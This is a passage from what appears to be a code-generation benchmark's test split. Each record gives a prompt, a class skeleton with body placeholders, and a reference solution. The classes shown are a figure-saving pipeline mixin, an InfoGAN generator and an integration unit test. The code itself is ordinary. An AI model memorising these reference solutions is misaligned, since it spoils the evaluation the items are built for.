display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000028", "length_bytes": 34127, "license_type": "permissive", "methods": [{"docstring": "builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')", "name": "build_display_context_for_session", "signature": "def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext'"}, {"docstring": "builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')", "name": "build_display_context_for_filtered_session", "signature": "def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext'"}, {"docstring": "outputs the figure using the provided context.", "name": "output_figure", "signature": "def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True)"}, {"docstring": "makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy", "name": "conform", "signature": "def conform(cls, obj)"}], "n_methods": 4, "prompt": "Implement the Python class `PipelineWithDisplaySavingMixin` described below.\n\nClass description:\nprovides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\n\nMethod signatures and docstrings:\n- def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True): outputs the figure using the provided context.\n- def conform(cls, obj): makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy", "prompted_full_text": "Implement the Python class `PipelineWithDisplaySavingMixin` described below.\n\nClass description:\nprovides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\n\nMethod signatures and docstrings:\n- def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True): outputs the figure using the provided context.\n- def conform(cls, obj): makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\n\n<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "revision_id": "212399d826284b394fce8894ff1a93133aef783f", "skeleton": "<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pyphoplacecellanalysis/General/Pipeline/Stages/Display.py", "source_repo": "CommanderPho/pyPhoPlaceCellAnalysis", "split": "test", "star_events_count": 1} {"blob_id": "ee7b959f12a81d2d981a9ebf5c2fdb4cef154f76", "bodies": ["super(InfoGAN_Generator, self).__init__()\nself.n_layer = n_layer\nself.n_conti = n_conti\nself.n_discrete = n_discrete\nself.num_category = num_category\nn_input = noise_dim + n_conti + n_discrete * num_category\nself.featmap_dim = featmap_dim\nself.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\nconvs = []\nBNs = []\nfor layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\nself.convs = nn.ModuleList(convs)\nself.BNs = nn.ModuleList(BNs)", "x = self.fc_in(x)\nx = x.view(-1, self.featmap_dim, 4, 4)\nfor layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\nreturn x"], "bodies_text": "<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "class_docstring": "", "class_name": "InfoGAN_Generator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000029", "length_bytes": 19546, "license_type": "no_license", "methods": [{"docstring": "InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.", "name": "__init__", "signature": "def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1)"}, {"docstring": "Input the random noise plus latent codes to generate fake images.", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "prompt": "Implement the Python class `InfoGAN_Generator` described below.\n\nClass description:\nImplement the InfoGAN_Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1): InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\n- def forward(self, x): Input the random noise plus latent codes to generate fake images.", "prompted_full_text": "Implement the Python class `InfoGAN_Generator` described below.\n\nClass description:\nImplement the InfoGAN_Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1): InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\n- def forward(self, x): Input the random noise plus latent codes to generate fake images.\n\n<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InfoGAN_Generator:\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_AaronYALai_Generative_Adversarial_Networks_PyTorch.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "f7c0618e8b1af213f6594ad1a6496f5de699e589", "bodies": ["height_points = np.array([5.0, 10.0, 20.0])\ncube = _set_up_height_cube(height_points)\nself.plugin_positive = Integration('height', positive_integration=True)\nself.plugin_positive.input_cube = cube.copy()\nself.plugin_negative = Integration('height')\nself.plugin_negative.input_cube = cube.copy()", "result = self.plugin_negative.prepare_for_integration()\nself.assertIsInstance(result, tuple)\nself.assertEqual(len(result), 2)\nself.assertIsInstance(result[0], iris.cube.Cube)\nself.assertIsInstance(result[1], iris.cube.Cube)", "result = self.plugin_positive.prepare_for_integration()\nself.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\nself.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))", "self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\nresult = self.plugin_negative.prepare_for_integration()\nself.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\nself.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))"], "bodies_text": "<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "class_docstring": "Test the prepare_for_integration method.", "class_name": "Test_prepare_for_integration", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000030", "length_bytes": 25011, "license_type": "permissive", "methods": [{"docstring": "Set up the cube.", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Test that the type of the returned value is as expected and the expected number of items are returned.", "name": "test_basic", "signature": "def test_basic(self)"}, {"docstring": "Test that the expected coordinate points are returned for each cube when the direction of integration is positive.", "name": "test_positive_points", "signature": "def test_positive_points(self)"}, {"docstring": "Test that the expected coordinate points are returned for each cube when the direction of integration is negative.", "name": "test_negative_points", "signature": "def test_negative_points(self)"}], "n_methods": 4, "prompt": "Implement the Python class `Test_prepare_for_integration` described below.\n\nClass description:\nTest the prepare_for_integration method.\n\nMethod signatures and docstrings:\n- def setUp(self): Set up the cube.\n- def test_basic(self): Test that the type of the returned value is as expected and the expected number of items are returned.\n- def test_positive_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\n- def test_negative_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is negative.", "prompted_full_text": "Implement the Python class `Test_prepare_for_integration` described below.\n\nClass description:\nTest the prepare_for_integration method.\n\nMethod signatures and docstrings:\n- def setUp(self): Set up the cube.\n- def test_basic(self): Test that the type of the returned value is as expected and the expected number of items are returned.\n- def test_positive_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\n- def test_negative_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\n\n<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is 